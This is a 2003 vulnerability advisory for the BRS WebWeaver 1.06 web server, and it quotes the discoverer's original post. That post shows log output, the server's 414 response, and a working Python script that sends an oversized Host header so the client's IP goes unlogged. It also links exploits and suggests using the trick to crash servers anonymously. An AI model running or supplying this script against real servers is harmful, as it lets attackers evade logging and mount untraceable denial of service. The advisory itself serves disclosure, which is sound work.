BRS WebWeaver May Fail to Properly Log Certain Requests With Long Host Field Contents
|
|
SecurityTracker Alert ID: 1007801
|
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Sep 24 2003
|
Impact: Modification of user information
|
Advisory: Freedom 0f Knowledge Project
|
Version(s): 1.06
|
Description: A vulnerability was reported in BRS WebWeaver. A remote user can submit HTTP requests that will not be fully logged.
A remote user can request a URL with a long HTTP Host field. The server will reportedly respond with an error message, but will
not log the IP address of the remote user.
A demonstration exploit script is provided in the Source Message.
|
Impact: A remote user can submit certain HTTP requests that will not be properly logged by the web server.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: www.brswebweaver.com/ (Links to External Site)
|
Cause: Exception handling error
|
Underlying OS: Windows (Any)
|
Reported By: "euronymous" <just-a-user@yandex.ru>
|
Message History:
None.
|
Source Message Contents
|
Date: Wed, 24 Sep 2003 19:59:23 +0400 (MSD)
From: "euronymous" <just-a-user@yandex.ru>
Subject: BRS WebWeaver: Anonymous Surfing
|
=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
topic: BRS WebWeaver: Anonymous Surfing
product: BRS WebWeaver 1.06
vendor: http://www.brswebweaver.com
risk: high
date: 09/24/2k3
discovered by: euronymous /F0KP
advisory urls: http://f0kp.iplus.ru/bz/027_en
http://f0kp.iplus.ru/bz/027_ru
contact email: euronymous at iplus dot ru
=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
0x01. Anonymous surfing
=======================
WebWeaver 1.06 and probably prior versions will allow `anonymous surfing' with
some trick. If you request the http server with long `Host' field of HTTP
packet, then Webweaver dont logs your IP adrress in server log:
HTTP Server Started - 24/Sep/2003:18:13:39
10.0.0.6 - - [24/Sep/2003:18:15:01] "GET / HTTP/1.1" 304 "-" "-"
10.0.0.6 - - [24/Sep/2003:18:15:03] "GET / HTTP/1.1" 304 "-" "-"
- - [24/Sep/2003:18:15:14] "GET / HTTP/1.1" 414 "-" "-"
- - [24/Sep/2003:18:16:01] "GET / HTTP/1.1" 414 "-" "-"
- - [24/Sep/2003:18:16:11] "GET / HTTP/1.1" 414 "-" "-"
HTTP server response:
---------------------
HTTP/1.0 414 Request-URI Too Large
Sever: BRS WebWeaver/1.06
Date: Wed, 24 Sep 2003 14:16:11 GMT
Content-Type: text/html
<HTML><HEAD><TITLE>414 Request-URI Too Large</TITLE></HEAD><BODY><
H1>414 Request
-URI Too Large</H1>The requested URL's length exceeds the capacity limit for thi
s server.</BODY></HTML>
Exploit code:
-------------
#! /usr/bin/env python
##
# by euronymous [ http://f0kp.iplus.ru ]
# Usage: ./WWanon.py <target_host>
##
import sys, socket
H0ST = sys.argv[1]
BUF = 'fp' * 0x815F
f = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
f.connect((H0ST,80))
f.send('GET / HTTP/1.1\r\n')
f.send('Host: '+BUF+'\n\n')
WWout = f.recv(1024)
f.close
print WWout
0x02. Remote crashes again
==========================
WW author was unable to fix early overflow conditions in his crappy proggie, he
is just increases the vulnerable buffer size. Therefore, you still can to crash
any WW instances with exploits, released earlier, but you have to change size of
request in exploit code. Using technik, that mentioned above, you can DoS
anonymously.
Exploit urls:
[1] http://f0kp.iplus.ru/bz/fWWhtdos.py - will crash WW with long GET request.
[2] http://f0kp.iplus.ru/bz/fadvWWhtdos.py - will crash WW with HEAD or POST
0x03. Greetings
===============
Jlx, nimber, R00T, black_c0de, OverG, f0st3r, 3APA3A and more..
|
|
